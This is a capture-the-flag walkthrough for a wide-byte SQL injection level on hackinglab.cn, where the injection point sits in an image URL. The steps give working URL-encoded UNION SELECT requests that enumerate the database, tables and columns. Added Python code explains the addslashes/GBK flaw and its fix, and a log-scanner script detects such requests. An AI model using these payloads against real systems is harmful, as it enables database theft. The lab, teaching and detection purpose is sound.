
hackinglab.cn series -> Injection levels: 邂逅 (Encounter)

Today I reached injection level 5 and was stuck for a long time. After searching online I found that the injection point is not at http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/?id=1 but in an image link, http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg, and that it is a wide-byte injection.
Notes:
1. Injecting directly in the browser just shows a broken image; do the injection in Burp Suite.
2. When injecting in Burp Suite, URL-encode the payload, e.g. write a space as %20.
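Why the `%df%27` prefix works, and how the bug is fixed, as an added example (my own illustration, not the lab's code): the server escapes the raw bytes with a PHP-style addslashes(), but the database then decodes the bytes as GBK, so the 0xDF lead byte and the inserted backslash (0x5C) merge into one two-byte character and the quote is left live. The `addslashes` helper below is a hypothetical stand-in for the real function; the safe variant escapes only after decoding, which is what a correctly configured mysqli_real_escape_string() or, better, a prepared statement achieves.

```python
import re

# Hypothetical stand-in for PHP's addslashes(): byte-wise, escapes ' " \ and NUL.
def addslashes(raw: bytes) -> bytes:
    out = bytearray()
    for b in raw:
        if b in (0x27, 0x22, 0x5C, 0x00):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def escape_text(text: str) -> str:
    """Escaping done on decoded characters, so a backslash can no longer be eaten by a lead byte."""
    return text.replace("\\", "\\\\").replace("'", "\\'")


def has_live_quote(sql_fragment: str) -> bool:
    """True if the fragment still contains a quote that is not preceded by a backslash."""
    return re.search(r"(?<!\\)'", sql_fragment) is not None


def unescaped_quote_survives(user_input: bytes) -> bool:
    """Vulnerable order: escape the raw bytes first, then the DB decodes them as GBK."""
    escaped = addslashes(user_input)
    decoded = escaped.decode("gbk", errors="replace")   # 0xDF 0x5C becomes one GBK character
    return has_live_quote(decoded)


def unescaped_quote_survives_after_decoding(user_input: bytes) -> bool:
    """Hardened order: decode to characters first, then escape the characters."""
    decoded = user_input.decode("gbk", errors="replace")
    return has_live_quote(escape_text(decoded))


if __name__ == "__main__":
    # Constructed inputs: a plain quote and the wide-byte prefixed quote from the writeup.
    for sample in (b"'", b"\xdf'"):
        print(sample, "vulnerable:", unescaped_quote_survives(sample),
              "hardened:", unescaped_quote_survives_after_decoding(sample))
```

The vulnerable path reports a live quote only for the `\xdf'` input, which is exactly why the plain `'` probe looked "safe" in this level. The real fix is a prepared statement; if escaping must be used, the connection charset has to be set through the driver (mysqli_set_charset) so the escaper and the server agree on the encoding.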
Walkthrough:
1. Dump the current database name:
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,database(),4%23 HTTP/1.1
Result: mydbs
2. Dump the table names:
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20where%20table_schema=0x6d79646273%20limit%200,1),4%23 HTTP/1.1
Result: article
Dumping the second table the same way gives pic (the flag is in this table).
3. Get all column names of the pic table:
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20column_name%20from%20information_schema.columns%20where%20table_name=0x706963%20limit%200,1),4%23 HTTP/1.1
Result: id
The same way gives picname, data, text.
4. Get the data in the picname column:
GET /sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/dog1.jpg?id=%df%27%20union%20select%201,2,(select%20picname%20from%20pic%20limit%202,1),4%23

The output is an image name, not the flag...
5. Visit the image:
http://lab1.xseclab.com/sqli6_f37a4a60a4a234cd309ce48ce45b9b00/images/flagishere_askldjfklasjdfl.jpg

getflag!
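What this looks like from the other side, as an added example that is not part of the original writeup: a small access-log scanner that flags the request pattern used in steps 1-4 (a query string carrying UNION SELECT or information_schema, and the 0xDF-then-quote wide-byte prefix), and notes when such a query string arrives on a static image path like the one this level hides the injection point in. The log lines are constructed for the example and the thresholds are my own choices.

```python
import re
from urllib.parse import urlsplit, unquote_to_bytes

# Constructed sample lines in combined-log style (not real lab traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /images/dog1.jpg HTTP/1.1" 200 5120
10.0.0.5 - - [01/Jan/2024:10:00:01 +0000] "GET /images/dog1.jpg?id=1 HTTP/1.1" 200 5120
10.0.0.9 - - [01/Jan/2024:10:00:02 +0000] "GET /images/dog1.jpg?id=%df%27%20union%20select%201,2,database(),4%23 HTTP/1.1" 200 77
10.0.0.9 - - [01/Jan/2024:10:00:03 +0000] "GET /?id=%df%27%20union%20select%201,2,(select%20table_name%20from%20information_schema.tables%20limit%200,1),4%23 HTTP/1.1" 200 77
"""

REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d+)'
)
SQLI_RE = re.compile(r"union\s+select|information_schema|database\(\)", re.IGNORECASE)
STATIC_EXT = (".jpg", ".jpeg", ".png", ".gif")


def analyse_line(line: str):
    """Return a finding dict for one log line, or None if the line does not parse."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    # Percent-decode to bytes, then read as latin-1 so 0xDF stays a single inspectable byte.
    query = unquote_to_bytes(parts.query).decode("latin-1")
    reasons = []
    if SQLI_RE.search(query):
        reasons.append("sql keywords in query string")
    if "\xdf'" in query:
        reasons.append("wide-byte quote prefix")
    # A parameterised request to a static image is not malicious by itself,
    # so it only raises the severity of a finding that already has a reason.
    static_with_query = parts.path.lower().endswith(STATIC_EXT) and bool(parts.query)
    return {
        "ip": m.group("ip"),
        "path": parts.path,
        "reasons": reasons,
        "severity": "high" if reasons and static_with_query else ("medium" if reasons else "none"),
    }


def flag_requests(log_text: str):
    """All findings with at least one reason, in log order."""
    findings = (analyse_line(line) for line in log_text.splitlines())
    return [f for f in findings if f and f["reasons"]]


if __name__ == "__main__":
    for f in flag_requests(SAMPLE_LOG):
        print(f["severity"], f["ip"], f["path"], ", ".join(f["reasons"]))
```

Decoding the query string to bytes before matching matters: the keywords are percent-encoded on the wire (the writeup's note about %20), so a matcher that looks at the raw request line would miss `union%20select`.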
===================================
This level was a real pain; they actually hid the injection point in an image...